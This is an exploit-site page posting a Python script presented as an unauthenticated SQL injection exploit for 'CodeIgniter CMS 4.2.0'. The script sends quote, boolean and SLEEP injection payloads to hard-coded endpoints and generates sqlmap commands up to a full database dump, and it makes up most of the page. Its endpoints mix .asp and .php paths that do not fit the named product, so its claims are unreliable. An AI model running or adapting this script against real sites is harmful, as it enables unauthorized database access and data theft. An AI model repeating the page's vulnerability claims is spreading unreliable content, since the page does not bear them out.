Share
## https://sploitus.com/exploit?id=PACKETSTORM:212191
=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167893/
[+] Summary :
multiple SQL Injection vulnerabilities in CodeIgniter CMS version 4.2.0.
The vulnerabilities affect various endpoints and parameters,
allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database.
Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters
"""
import requests
import sys
import urllib3
import time
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class CodeIgniterExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test multiple vulnerable endpoints
endpoints = [
"/Job/searchResult/?title=123",
"/Job/searchResult/?title=test",
"/search.php?search=1",
"/news.php?p=7251",
"/employe/show.php?cvid=14088",
"/login/",
"/fa/index.asp?p=search&search=1",
"/fa/FormView/1026",
"/fa/formview/1030"
]
vulnerable_endpoints = []
for endpoint in endpoints:
# Test with single quote
test_url = f"{self.target}{endpoint}'"
try:
response = self.session.get(test_url, timeout=10, verify=False)
# Check for SQL error indicators
error_indicators = [
"SQL syntax",
"mysql_fetch",
"mysql_num_rows",
"ODBC Driver",
"Unclosed quotation mark",
"syntax error",
"MySQL server",
"Warning: mysql",
"PostgreSQL",
"ORA-",
"Microsoft OLE DB"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] SQL Injection found in: {endpoint}")
vulnerable_endpoints.append(endpoint)
break
except Exception as e:
print(f"[-] Error testing {endpoint}: {e}")
continue
return vulnerable_endpoints
def exploit_boolean(self, endpoint):
"""Boolean-based blind SQL injection"""
print(f"[*] Testing boolean-based SQLi on: {endpoint}")
# Test boolean conditions
true_payload = f"{endpoint}' AND '1'='1"
false_payload = f"{endpoint}' AND '1'='2"
try:
true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False)
false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False)
if true_response.text != false_response.text:
print("[+] Boolean-based SQL Injection confirmed!")
return True
except Exception as e:
print(f"[-] Boolean test failed: {e}")
return False
def exploit_time_based(self, endpoint):
"""Time-based blind SQL injection"""
print(f"[*] Testing time-based SQLi on: {endpoint}")
time_payload = f"{endpoint}' AND SLEEP(5)--"
try:
start_time = time.time()
response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
return True
except Exception as e:
print(f"[-] Time-based test failed: {e}")
return False
def generate_sqlmap_commands(self, endpoints):
"""Generate sqlmap commands for automated exploitation"""
print("\n[+] SQLMap Commands:")
print("=" * 60)
for endpoint in endpoints:
url = f"{self.target}{endpoint}"
print(f"\n# For endpoint: {endpoint}")
print(f'sqlmap -u "{url}" --batch --level=5 --risk=3')
print(f'sqlmap -u "{url}" --batch --dbs')
print(f'sqlmap -u "{url}" --batch --current-db')
print(f'sqlmap -u "{url}" --batch --tables')
print(f'sqlmap -u "{url}" --batch --dump-all')
def comprehensive_scan(self):
"""Run comprehensive vulnerability scan"""
print("[*] Starting comprehensive CodeIgniter CMS scan...")
# Check vulnerability
vulnerable_endpoints = self.check_vulnerability()
if not vulnerable_endpoints:
print("[-] No SQL Injection vulnerabilities found")
return
print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")
# Test exploitation methods on each endpoint
for endpoint in vulnerable_endpoints:
print(f"\n[*] Testing exploitation methods for: {endpoint}")
# Boolean-based
self.exploit_boolean(endpoint)
# Time-based
self.exploit_time_based(endpoint)
# Generate sqlmap commands
self.generate_sqlmap_commands(vulnerable_endpoints)
def main():
banner = """
โโโโโโโ โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโ
โโโโโโโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
โโโโโโ โโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
CodeIgniter CMS 4.2.0 SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = CodeIgniterExploit(args.url)
if args.check:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
exploit.comprehensive_scan()
elif args.sqlmap:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
exploit.generate_sqlmap_commands(vulnerable_endpoints)
else:
print("[-] No vulnerable endpoints found for sqlmap")
else:
# Default: comprehensive scan
exploit.comprehensive_scan()
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python codeigniter_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================